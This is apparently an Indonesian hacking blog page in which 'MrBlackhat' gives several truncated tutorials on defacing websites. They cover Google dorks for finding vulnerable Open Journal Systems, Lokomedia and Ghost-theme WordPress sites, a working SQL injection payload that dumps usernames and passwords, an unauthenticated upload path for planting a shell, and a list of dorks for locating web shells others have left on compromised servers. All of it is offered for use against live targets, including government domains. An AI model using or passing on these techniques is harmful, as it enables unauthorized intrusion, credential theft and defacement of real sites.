KBCI INDONESIA

Assalamualaikum wr wb jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara deface poc ojs Oke tanpa basa basi langsung saja Bahan: - dork - internet - HP/laptop - scrip/shell kalian - pacar biar ada semangati:v Dork: -intext:Journal "new submission"            -inurl:/index.php/index/user/register            -intext:about submission "Journal"            -inurl:/index.php/ojs Kembangin lagi sesuai otak kalean xixixi Untuk mengecek web nya vuln atau gak kalian bisa ketik /files di depan contoh: https://kbcii.blogspot.com/files  jika nanti muncul index of berarti vuln. Yang pertama kalian dorking terlebih dahulu di google kesayangan anda Jika sudah kalian Register terlebih dahulu gan isi terserah yang ada tanda * dan isi phone jika sudah kalian centang yang ada tulisan  Author : Able to submit items to the journal Jika sudah kalian sudah registrasi nanti kayak gambar bawah ini. Trus kalian pencet yang tulisan itu New Subm

Assalamualaikum jumpa lagi dengan saya MrBlachat kali ini aku akan kasih saya kasih tutorial cara deface SQL LOKOMEDIA Oke langsung saja Bahan - hp/pc - dork - internet pastinya - MD 5Decrypter - pacar biar ada yang semangatin - kopi biar otak fresss Dork:-  inurl:statis-1-pengantar.html             - i nurl:statis-1/profil.html             - inurl:statis-19-beasiswa.html             - inurl:statis-22-kerjasama.html Kembangin lagi gan sesuai otak kalian Exploit: 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ Ok langsung saja ke tutorial nya Pertama kalian dorking di google kesayangan anda kayak seperti di bawah ini Jika kalian dah punya target tinggal kalian masukkan exploit nya di atas Contoh: http://nama domain.go.id/statis- 'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+1-profil.html Jika sudah nati akan ketahuan u

Assalamualaikum wr.wb jumpa lagi dengan saya MrBlachat kali ini aku akan kasih tutorial cara deface poc Wp-ghost themes+live target Oke langsung saja Bahan: - Dork - scrip html/shell.php kalian - csrf online - pacar biar ada semangatin:v - kopi biar gak terlalu tegang Dork:- inurl:wp-content/themes/Ghost/ Exploit:wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Ok langsung saja ke tutorial nya Pertama kalian masukkan dork di atas ke Google kesayangan anda jika sudah masukan exploit nya contoh: https://nama domain.com/ wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php Jika vuln nanti kayak di gambar di bawah Jika vuln di atas kalian masukan link target kalian ke csrf online dan ingat harus Filedata Jika sudah untuk cara manggil target Contoh: https://Nama target kalian.com/ wp-content/uploads/settingimages/nama shell kalian atau script deface kalian. Nah tinggal mirror deh>_< xixixixi Oke sekian dari tutorial da

Assalamu'alaikum wr wb Jumpa lagi dengan saya MrBlackhat kali ini saya akan kasih tutorial cara dorking shell tanpa basa basi kita langsung saja ke tutorialnya cekidot Bahan: - HP/laptop - shell/script deface kalian - pacar biar ada semangatin Dork:  intitle:index of wso.php intext:64k intitle:index of lux.php intext:64k intitle:index of mego.php Intex:64k intitle:index of raw.php intext:64k intitle:index of H3IIO.php intext:64k intitle:index of H3IIX.php intext:48k intitle:index of shell.php intext:64k intitle:index of cgi.php intext:64k intitle:index of DrugO.php intext:64k intitle:index of xleet.php intext:48k [New Dork] intitle:index of / cgp.php intitle:index of / pgp.php intitle:index of / shell23.php intitle:index of / semo.php intitle:index of / shell9.php intitle:index of / Cih.php intitle:index of / cp2019.php intitle:index of / ml.php intitle:index of / dr.php intitle:index of / df.php intitle:index of / mst.php intitle:index of / full.ph